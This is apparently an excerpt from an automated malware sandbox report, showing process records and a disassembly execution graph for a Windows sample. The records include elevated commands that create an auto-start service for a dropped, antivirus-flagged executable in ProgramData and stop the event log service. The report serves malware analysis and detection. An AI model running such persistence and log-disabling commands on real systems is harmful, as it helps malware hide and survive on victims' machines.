                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff783440000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:47
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "IFAYFBKT"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:48
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:49
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:50
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:51
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:52
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:53
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "IFAYFBKT"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:54
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:55
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:56
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
                                                      Imagebase:0x7ff615570000
                                                      File size:5'475'840 bytes
                                                      MD5 hash:7A568EF3F46D369F3D3FFD68FDF68573
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 81%, ReversingLabs
                                                      • Detection: 61%, Virustotal, Browse
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:13.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:30.7%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:23
                                                        execution_graph 20379 7ff7f4d864fc 20402 7ff7f4d85f84 20379->20402 20382 7ff7f4d86648 20518 7ff7f4d86900 7 API calls 2 library calls 20382->20518 20383 7ff7f4d86518 __scrt_acquire_startup_lock 20385 7ff7f4d86652 20383->20385 20392 7ff7f4d86536 __scrt_release_startup_lock 20383->20392 20519 7ff7f4d86900 7 API calls 2 library calls 20385->20519 20387 7ff7f4d8655b 20388 7ff7f4d8665d abort 20389 7ff7f4d865e1 20410 7ff7f4d86a4c 20389->20410 20391 7ff7f4d865e6 20413 7ff7f4d901c0 20391->20413 20392->20387 20392->20389 20515 7ff7f4d8f4f0 35 API calls __GSHandlerCheck_EH 20392->20515 20399 7ff7f4d86609 20399->20388 20517 7ff7f4d86118 7 API calls __scrt_initialize_crt 20399->20517 20401 7ff7f4d86620 20401->20387 20520 7ff7f4d86740 20402->20520 20405 7ff7f4d85fb3 20522 7ff7f4d900f0 20405->20522 20406 7ff7f4d85faf 20406->20382 20406->20383 20539 7ff7f4d87480 20410->20539 20412 7ff7f4d86a63 GetStartupInfoW 20412->20391 20541 7ff7f4d93b80 20413->20541 20415 7ff7f4d865ee 20418 7ff7f4d83fcc 20415->20418 20417 7ff7f4d901cf 20417->20415 20545 7ff7f4d93f10 35 API calls swprintf 20417->20545 20419 7ff7f4d84006 20418->20419 20547 7ff7f4d67a28 GetCurrentDirectoryW 20419->20547 20421 7ff7f4d84012 20557 7ff7f4d7d068 20421->20557 20423 7ff7f4d8401c memcpy_s 20562 7ff7f4d7d6e4 20423->20562 20425 7ff7f4d84654 20427 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20425->20427 20426 7ff7f4d841e6 GetCommandLineW 20430 7ff7f4d841f8 20426->20430 20431 7ff7f4d843ba 20426->20431 20429 7ff7f4d8465a 20427->20429 20428 7ff7f4d84091 20428->20425 20428->20426 20661 7ff7f4d8ae54 20429->20661 20572 7ff7f4d612bc 20430->20572 20613 7ff7f4d67c10 20431->20613 20434 7ff7f4d843c9 20437 7ff7f4d61b70 31 API calls 20434->20437 20441 7ff7f4d843e0 memcpy_s 20434->20441 20436 7ff7f4d8421d 20582 7ff7f4d805e0 20436->20582 20437->20441 20625 7ff7f4d61b70 20441->20625 20442 7ff7f4d8440b SetEnvironmentVariableW GetLocalTime 20630 7ff7f4d661e8 20442->20630 20446 7ff7f4d84227 20446->20429 20451 7ff7f4d84353 20446->20451 20452 7ff7f4d84271 OpenFileMappingW 20446->20452 20462 7ff7f4d612bc 33 API calls 20451->20462 20454 7ff7f4d84348 CloseHandle 20452->20454 20455 7ff7f4d84291 MapViewOfFile 20452->20455 20454->20431 20455->20454 20458 7ff7f4d842b7 UnmapViewOfFile MapViewOfFile 20455->20458 20458->20454 20463 7ff7f4d842e9 20458->20463 20460 7ff7f4d844ed 20658 7ff7f4d7a3f0 20460->20658 20466 7ff7f4d84378 20462->20466 20666 7ff7f4d7dcc8 33 API calls 2 library calls 20463->20666 20600 7ff7f4d837d0 20466->20600 20468 7ff7f4d842f9 20474 7ff7f4d837d0 35 API calls 20468->20474 20477 7ff7f4d84308 20474->20477 20475 7ff7f4d7a3f0 4 API calls 20478 7ff7f4d844ff DialogBoxParamW 20475->20478 20667 7ff7f4d6bd2c 131 API calls 20477->20667 20489 7ff7f4d8454b 20478->20489 20482 7ff7f4d8464f 20486 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20482->20486 20483 7ff7f4d8431d 20668 7ff7f4d6be78 131 API calls shared_ptr 20483->20668 20486->20425 20488 7ff7f4d84330 20495 7ff7f4d8433f UnmapViewOfFile 20488->20495 20491 7ff7f4d8455e Sleep 20489->20491 20492 7ff7f4d84564 20489->20492 20491->20492 20493 7ff7f4d84572 shared_ptr 20492->20493 20669 7ff7f4d7da84 49 API calls 2 library calls 20492->20669 20498 7ff7f4d8457e DeleteObject 20493->20498 20495->20454 20500 7ff7f4d8459d 20498->20500 20501 7ff7f4d84597 DeleteObject 20498->20501 20504 7ff7f4d845d3 20500->20504 20510 7ff7f4d845e5 20500->20510 20501->20500 20670 7ff7f4d838e8 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 20504->20670 20508 7ff7f4d845d8 CloseHandle 20508->20510 20671 7ff7f4d85bf0 20510->20671 20515->20389 20516 7ff7f4d86a90 GetModuleHandleW 20516->20399 20517->20401 20518->20385 20519->20388 20521 7ff7f4d85fa6 __scrt_dllmain_crt_thread_attach 20520->20521 20521->20405 20521->20406 20523 7ff7f4d9419c 20522->20523 20524 7ff7f4d85fb8 20523->20524 20527 7ff7f4d920d0 20523->20527 20524->20406 20526 7ff7f4d883a0 7 API calls 2 library calls 20524->20526 20526->20406 20538 7ff7f4d927e8 EnterCriticalSection 20527->20538 20540 7ff7f4d87460 20539->20540 20540->20412 20540->20540 20542 7ff7f4d93b8d 20541->20542 20544 7ff7f4d93b99 20541->20544 20546 7ff7f4d939c0 48 API calls 5 library calls 20542->20546 20544->20417 20545->20417 20546->20544 20548 7ff7f4d67a4c 20547->20548 20553 7ff7f4d67ad9 20547->20553 20680 7ff7f4d613c4 20548->20680 20551 7ff7f4d67a8d 20688 7ff7f4d61c80 20551->20688 20553->20421 20554 7ff7f4d67a9b 20554->20553 20555 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20554->20555 20556 7ff7f4d67af5 20555->20556 20695 7ff7f4d6dc08 20557->20695 20559 7ff7f4d7d07d OleInitialize 20560 7ff7f4d7d0a3 20559->20560 20561 7ff7f4d7d0c9 SHGetMalloc 20560->20561 20561->20423 20563 7ff7f4d7d719 20562->20563 20565 7ff7f4d7d71e memcpy_s 20562->20565 20564 7ff7f4d61b70 31 API calls 20563->20564 20564->20565 20566 7ff7f4d61b70 31 API calls 20565->20566 20567 7ff7f4d7d74d memcpy_s 20565->20567 20566->20567 20568 7ff7f4d61b70 31 API calls 20567->20568 20569 7ff7f4d7d77c memcpy_s 20567->20569 20568->20569 20570 7ff7f4d61b70 31 API calls 20569->20570 20571 7ff7f4d7d7ab memcpy_s 20569->20571 20570->20571 20571->20428 20573 7ff7f4d613bb 20572->20573 20574 7ff7f4d612f0 20572->20574 21112 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20573->21112 20577 7ff7f4d61358 20574->20577 20578 7ff7f4d613b6 20574->20578 20581 7ff7f4d612fe memcpy_s 20574->20581 20580 7ff7f4d85aa0 4 API calls 20577->20580 20577->20581 21111 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20578->21111 20580->20581 20581->20436 20583 7ff7f4d6cf94 33 API calls 20582->20583 20599 7ff7f4d8062f memcpy_s 20583->20599 20584 7ff7f4d8089b 20585 7ff7f4d808ce 20584->20585 20588 7ff7f4d808f4 20584->20588 20586 7ff7f4d85bf0 _handle_error 8 API calls 20585->20586 20589 7ff7f4d808df 20586->20589 20587 7ff7f4d6cf94 33 API calls 20587->20599 20590 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20588->20590 20589->20446 20591 7ff7f4d808f9 20590->20591 21114 7ff7f4d6353c 47 API calls 20591->21114 20592 7ff7f4d808ff 21115 7ff7f4d6353c 47 API calls 20592->21115 20595 7ff7f4d612bc 33 API calls 20595->20599 20598 7ff7f4d61b70 31 API calls 20598->20599 20599->20584 20599->20587 20599->20588 20599->20591 20599->20592 20599->20595 20599->20598 21113 7ff7f4d6be78 131 API calls shared_ptr 20599->21113 20601 7ff7f4d837fd 20600->20601 20602 7ff7f4d83800 SetEnvironmentVariableW 20600->20602 20601->20602 20603 7ff7f4d6cf94 33 API calls 20602->20603 20606 7ff7f4d83838 20603->20606 20604 7ff7f4d83887 20608 7ff7f4d838df 20604->20608 20609 7ff7f4d838be 20604->20609 20605 7ff7f4d85bf0 _handle_error 8 API calls 20607 7ff7f4d838cf 20605->20607 20606->20604 20612 7ff7f4d83871 SetEnvironmentVariableW 20606->20612 20607->20431 20607->20482 20610 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20608->20610 20609->20605 20611 7ff7f4d838e4 20610->20611 20612->20604 20614 7ff7f4d613c4 33 API calls 20613->20614 20615 7ff7f4d67c45 20614->20615 20616 7ff7f4d67c48 GetModuleFileNameW 20615->20616 20619 7ff7f4d67c98 20615->20619 20617 7ff7f4d67c9a 20616->20617 20618 7ff7f4d67c63 20616->20618 20617->20619 20618->20615 20620 7ff7f4d612bc 33 API calls 20619->20620 20622 7ff7f4d67cc2 20620->20622 20621 7ff7f4d67cfa 20621->20434 20622->20621 20623 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20622->20623 20624 7ff7f4d67d1c 20623->20624 20626 7ff7f4d61b83 20625->20626 20627 7ff7f4d61bac 20625->20627 20626->20627 20628 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20626->20628 20627->20442 20629 7ff7f4d61bd0 20628->20629 20631 7ff7f4d6620d swprintf 20630->20631 20632 7ff7f4d8d308 swprintf 46 API calls 20631->20632 20633 7ff7f4d66229 SetEnvironmentVariableW GetModuleHandleW LoadIconW 20632->20633 20634 7ff7f4d7eb24 LoadBitmapW 20633->20634 20635 7ff7f4d7eb4e 20634->20635 20636 7ff7f4d7eb56 20634->20636 21116 7ff7f4d7c220 FindResourceW 20635->21116 20638 7ff7f4d7eb5e GetObjectW 20636->20638 20639 7ff7f4d7eb73 20636->20639 20638->20639 21128 7ff7f4d7c0ec 20639->21128 20642 7ff7f4d7ebde 20653 7ff7f4d69cac 20642->20653 20643 7ff7f4d7ebae 21133 7ff7f4d7c154 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 20643->21133 20644 7ff7f4d7c220 9 API calls 20646 7ff7f4d7eb9a 20644->20646 20646->20643 20648 7ff7f4d7eba2 DeleteObject 20646->20648 20647 7ff7f4d7ebb7 21134 7ff7f4d7c11c 20647->21134 20648->20643 20652 7ff7f4d7ebcf DeleteObject 20652->20642 21141 7ff7f4d69cdc 20653->21141 20655 7ff7f4d69cba 21208 7ff7f4d6a83c GetModuleHandleW FindResourceW 20655->21208 20657 7ff7f4d69cc2 20657->20460 20659 7ff7f4d85aa0 4 API calls 20658->20659 20660 7ff7f4d7a436 20659->20660 20660->20475 21290 7ff7f4d8ad8c 31 API calls 2 library calls 20661->21290 20663 7ff7f4d8ae6d 21291 7ff7f4d8ae84 16 API calls abort 20663->21291 20666->20468 20667->20483 20668->20488 20669->20493 20670->20508 20672 7ff7f4d85bf9 20671->20672 20673 7ff7f4d84632 20672->20673 20674 7ff7f4d85ce0 IsProcessorFeaturePresent 20672->20674 20673->20516 20675 7ff7f4d85cf8 20674->20675 21292 7ff7f4d85ed4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20675->21292 20677 7ff7f4d85d0b 21293 7ff7f4d85ca0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20677->21293 20681 7ff7f4d613cd 20680->20681 20687 7ff7f4d6144d GetCurrentDirectoryW 20680->20687 20682 7ff7f4d613ee memcpy_s 20681->20682 20683 7ff7f4d6145d 20681->20683 20692 7ff7f4d6196c 31 API calls _invalid_parameter_noinfo_noreturn 20682->20692 20693 7ff7f4d61be8 33 API calls std::_Xinvalid_argument 20683->20693 20687->20551 20689 7ff7f4d61cc6 20688->20689 20691 7ff7f4d61c9b memcpy_s 20688->20691 20694 7ff7f4d61464 33 API calls 3 library calls 20689->20694 20691->20554 20692->20687 20694->20691 20696 7ff7f4d613c4 33 API calls 20695->20696 20697 7ff7f4d6dc50 GetSystemDirectoryW 20696->20697 20698 7ff7f4d6dc75 20697->20698 20717 7ff7f4d6dc6e 20697->20717 20701 7ff7f4d612bc 33 API calls 20698->20701 20699 7ff7f4d6de08 20700 7ff7f4d85bf0 _handle_error 8 API calls 20699->20700 20703 7ff7f4d6de1c 20700->20703 20705 7ff7f4d6dcad 20701->20705 20702 7ff7f4d6de35 20704 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20702->20704 20703->20559 20706 7ff7f4d6de3a 20704->20706 20707 7ff7f4d612bc 33 API calls 20705->20707 20708 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20706->20708 20709 7ff7f4d6dcd5 20707->20709 20710 7ff7f4d6de40 20708->20710 20804 7ff7f4d688f8 20709->20804 20712 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20710->20712 20713 7ff7f4d6de46 20712->20713 20716 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20713->20716 20714 7ff7f4d6dd71 LoadLibraryW 20714->20717 20715 7ff7f4d6dce7 20715->20706 20715->20710 20715->20714 20718 7ff7f4d6de4c _snwprintf 20716->20718 20717->20699 20717->20702 20717->20713 20719 7ff7f4d6de74 GetModuleHandleW 20718->20719 20720 7ff7f4d6defb 20719->20720 20721 7ff7f4d6dea6 GetProcAddress 20719->20721 20724 7ff7f4d6e383 20720->20724 20851 7ff7f4d8ebfc 39 API calls 2 library calls 20720->20851 20722 7ff7f4d6debb 20721->20722 20723 7ff7f4d6ded3 GetProcAddress 20721->20723 20722->20723 20723->20720 20727 7ff7f4d6dee8 20723->20727 20726 7ff7f4d67c10 34 API calls 20724->20726 20729 7ff7f4d6e38c 20726->20729 20727->20720 20728 7ff7f4d6e230 20728->20724 20730 7ff7f4d6e23a 20728->20730 20820 7ff7f4d68b28 20729->20820 20732 7ff7f4d67c10 34 API calls 20730->20732 20733 7ff7f4d6e243 CreateFileW 20732->20733 20734 7ff7f4d6e283 SetFilePointer 20733->20734 20735 7ff7f4d6e370 CloseHandle 20733->20735 20734->20735 20737 7ff7f4d6e29c ReadFile 20734->20737 20738 7ff7f4d61b70 31 API calls 20735->20738 20737->20735 20739 7ff7f4d6e2c4 20737->20739 20738->20724 20741 7ff7f4d6e2d8 20739->20741 20742 7ff7f4d6e680 20739->20742 20740 7ff7f4d6dc08 77 API calls 20766 7ff7f4d6e39a 20740->20766 20746 7ff7f4d612bc 33 API calls 20741->20746 20870 7ff7f4d85db4 8 API calls 20742->20870 20744 7ff7f4d6e3be CompareStringW 20744->20766 20745 7ff7f4d612bc 33 API calls 20745->20766 20751 7ff7f4d6e30f 20746->20751 20749 7ff7f4d6e4ba 20752 7ff7f4d6e4c8 20749->20752 20753 7ff7f4d6e642 20749->20753 20750 7ff7f4d61b70 31 API calls 20750->20766 20754 7ff7f4d6e35b 20751->20754 20765 7ff7f4d6dc08 77 API calls 20751->20765 20852 7ff7f4d6cf94 20751->20852 20856 7ff7f4d68be4 47 API calls 20752->20856 20758 7ff7f4d61b70 31 API calls 20753->20758 20760 7ff7f4d61b70 31 API calls 20754->20760 20755 7ff7f4d6e6ab 20763 7ff7f4d6e6c5 SetThreadExecutionState 20755->20763 20872 7ff7f4d63b84 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 20755->20872 20756 7ff7f4d6e685 20756->20755 20871 7ff7f4d63b84 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 20756->20871 20764 7ff7f4d6e64b 20758->20764 20767 7ff7f4d6e365 20760->20767 20762 7ff7f4d6e4d1 20768 7ff7f4d66768 9 API calls 20762->20768 20771 7ff7f4d61b70 31 API calls 20764->20771 20765->20751 20766->20740 20766->20744 20766->20745 20766->20750 20788 7ff7f4d6e44c 20766->20788 20828 7ff7f4d66768 20766->20828 20833 7ff7f4d68dc4 20766->20833 20837 7ff7f4d65890 20766->20837 20772 7ff7f4d61b70 31 API calls 20767->20772 20773 7ff7f4d6e4d6 20768->20773 20769 7ff7f4d612bc 33 API calls 20769->20788 20774 7ff7f4d6e655 20771->20774 20772->20735 20775 7ff7f4d6e586 20773->20775 20776 7ff7f4d6e4e1 20773->20776 20778 7ff7f4d85bf0 _handle_error 8 API calls 20774->20778 20780 7ff7f4d6d9c0 48 API calls 20775->20780 20779 7ff7f4d6dc08 77 API calls 20776->20779 20777 7ff7f4d68dc4 47 API calls 20777->20788 20781 7ff7f4d6e664 20778->20781 20782 7ff7f4d6e4ed 20779->20782 20783 7ff7f4d6e5cb AllocConsole 20780->20783 20781->20559 20785 7ff7f4d6dc08 77 API calls 20782->20785 20786 7ff7f4d6e5d5 GetCurrentProcessId AttachConsole 20783->20786 20787 7ff7f4d6e57b 20783->20787 20784 7ff7f4d61b70 31 API calls 20784->20788 20789 7ff7f4d6e4f9 20785->20789 20790 7ff7f4d6e5ec 20786->20790 20869 7ff7f4d619d0 31 API calls _invalid_parameter_noinfo_noreturn 20787->20869 20788->20749 20788->20769 20788->20777 20788->20784 20791 7ff7f4d65890 51 API calls 20788->20791 20857 7ff7f4d6aee0 20789->20857 20797 7ff7f4d6e5f8 GetStdHandle WriteConsoleW Sleep FreeConsole 20790->20797 20791->20788 20794 7ff7f4d6e639 ExitProcess 20797->20787 20799 7ff7f4d6aee0 48 API calls 20800 7ff7f4d6e54e 20799->20800 20867 7ff7f4d6db54 33 API calls 20800->20867 20802 7ff7f4d6e55a 20868 7ff7f4d619d0 31 API calls _invalid_parameter_noinfo_noreturn 20802->20868 20805 7ff7f4d68936 20804->20805 20873 7ff7f4d62314 20805->20873 20807 7ff7f4d68987 20883 7ff7f4d61c04 20807->20883 20808 7ff7f4d68946 20808->20807 20887 7ff7f4d61734 33 API calls 4 library calls 20808->20887 20811 7ff7f4d689cd 20812 7ff7f4d689f0 20811->20812 20814 7ff7f4d61c80 33 API calls 20811->20814 20813 7ff7f4d68a28 20812->20813 20816 7ff7f4d68a44 20812->20816 20815 7ff7f4d85bf0 _handle_error 8 API calls 20813->20815 20814->20812 20817 7ff7f4d68a39 20815->20817 20818 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20816->20818 20817->20715 20819 7ff7f4d68a49 20818->20819 20821 7ff7f4d68b40 20820->20821 20822 7ff7f4d68b89 20821->20822 20823 7ff7f4d68b57 20821->20823 20911 7ff7f4d6353c 47 API calls 20822->20911 20825 7ff7f4d612bc 33 API calls 20823->20825 20827 7ff7f4d68b7b 20825->20827 20827->20766 20829 7ff7f4d6678c GetVersionExW 20828->20829 20830 7ff7f4d667bf 20828->20830 20829->20830 20831 7ff7f4d85bf0 _handle_error 8 API calls 20830->20831 20832 7ff7f4d667ec 20831->20832 20832->20766 20834 7ff7f4d68dd9 20833->20834 20912 7ff7f4d68f28 20834->20912 20836 7ff7f4d68dfe 20836->20766 20838 7ff7f4d658bb GetFileAttributesW 20837->20838 20839 7ff7f4d658b8 20837->20839 20840 7ff7f4d658cc 20838->20840 20847 7ff7f4d65949 20838->20847 20839->20838 20921 7ff7f4d680b0 20840->20921 20842 7ff7f4d85bf0 _handle_error 8 API calls 20844 7ff7f4d6595d 20842->20844 20844->20766 20845 7ff7f4d658f7 GetFileAttributesW 20846 7ff7f4d65910 20845->20846 20846->20847 20848 7ff7f4d6596d 20846->20848 20847->20842 20849 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20848->20849 20850 7ff7f4d65972 20849->20850 20851->20728 20854 7ff7f4d6cfc6 20852->20854 20853 7ff7f4d6cffa 20853->20751 20854->20853 20855 7ff7f4d61734 33 API calls 20854->20855 20855->20854 20856->20762 20858 7ff7f4d6aef3 20857->20858 21012 7ff7f4d69b74 20858->21012 20861 7ff7f4d6af58 LoadStringW 20862 7ff7f4d6af86 20861->20862 20863 7ff7f4d6af71 LoadStringW 20861->20863 20864 7ff7f4d6d9c0 20862->20864 20863->20862 21038 7ff7f4d6d79c 20864->21038 20867->20802 20868->20787 20869->20794 20870->20756 20871->20755 20872->20763 20874 7ff7f4d62344 20873->20874 20881 7ff7f4d623f8 20873->20881 20875 7ff7f4d62352 memcpy_s 20874->20875 20878 7ff7f4d623f3 20874->20878 20879 7ff7f4d623a1 20874->20879 20875->20808 20897 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20878->20897 20879->20875 20888 7ff7f4d85aa0 20879->20888 20898 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20881->20898 20884 7ff7f4d61c55 20883->20884 20886 7ff7f4d61c29 memcpy_s 20883->20886 20910 7ff7f4d615a8 33 API calls 3 library calls 20884->20910 20886->20811 20887->20807 20892 7ff7f4d85aab 20888->20892 20889 7ff7f4d85ac4 20889->20875 20891 7ff7f4d85aca 20893 7ff7f4d85ad5 20891->20893 20902 7ff7f4d8670c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20891->20902 20892->20889 20892->20891 20899 7ff7f4d8f088 20892->20899 20903 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20893->20903 20904 7ff7f4d8f0c8 20899->20904 20902->20893 20909 7ff7f4d927e8 EnterCriticalSection 20904->20909 20910->20886 20913 7ff7f4d690c6 20912->20913 20917 7ff7f4d68f5a 20912->20917 20920 7ff7f4d6353c 47 API calls 20913->20920 20914 7ff7f4d68f74 memcpy_s 20914->20836 20917->20914 20919 7ff7f4d66edc 33 API calls 2 library calls 20917->20919 20919->20914 20922 7ff7f4d680ef 20921->20922 20936 7ff7f4d680e8 20921->20936 20924 7ff7f4d612bc 33 API calls 20922->20924 20923 7ff7f4d85bf0 _handle_error 8 API calls 20925 7ff7f4d658f3 20923->20925 20926 7ff7f4d6811a 20924->20926 20925->20845 20925->20846 20927 7ff7f4d6836b 20926->20927 20928 7ff7f4d6813a 20926->20928 20929 7ff7f4d67a28 35 API calls 20927->20929 20930 7ff7f4d68154 20928->20930 20954 7ff7f4d681ed 20928->20954 20933 7ff7f4d6838a 20929->20933 20931 7ff7f4d6874f 20930->20931 20994 7ff7f4d67050 20930->20994 21007 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20931->21007 20934 7ff7f4d68593 20933->20934 20939 7ff7f4d683bf 20933->20939 20992 7ff7f4d681e8 20933->20992 20938 7ff7f4d68773 20934->20938 20943 7ff7f4d67050 4 API calls 20934->20943 20935 7ff7f4d68755 20945 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20935->20945 20936->20923 21010 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20938->21010 20944 7ff7f4d68761 20939->20944 20950 7ff7f4d67050 4 API calls 20939->20950 20940 7ff7f4d68779 20946 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20940->20946 20942 7ff7f4d681a7 20955 7ff7f4d61b70 31 API calls 20942->20955 20960 7ff7f4d681b9 memcpy_s 20942->20960 20948 7ff7f4d685fa 20943->20948 21008 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20944->21008 20952 7ff7f4d6875b 20945->20952 20953 7ff7f4d6877f 20946->20953 20947 7ff7f4d6874a 20951 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20947->20951 21005 7ff7f4d611ec 33 API calls memcpy_s 20948->21005 20969 7ff7f4d6841a memcpy_s 20950->20969 20951->20931 20962 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20952->20962 20964 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20953->20964 20959 7ff7f4d612bc 33 API calls 20954->20959 20954->20992 20955->20960 20957 7ff7f4d68767 20967 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20957->20967 20958 7ff7f4d61b70 31 API calls 20958->20992 20965 7ff7f4d68262 20959->20965 20960->20958 20961 7ff7f4d6860d 21006 7ff7f4d66d64 33 API calls memcpy_s 20961->21006 20962->20944 20963 7ff7f4d61b70 31 API calls 20978 7ff7f4d68499 20963->20978 20970 7ff7f4d68785 20964->20970 21002 7ff7f4d66dd8 33 API calls 20965->21002 20968 7ff7f4d6876d 20967->20968 21009 7ff7f4d6353c 47 API calls 20968->21009 20969->20957 20969->20963 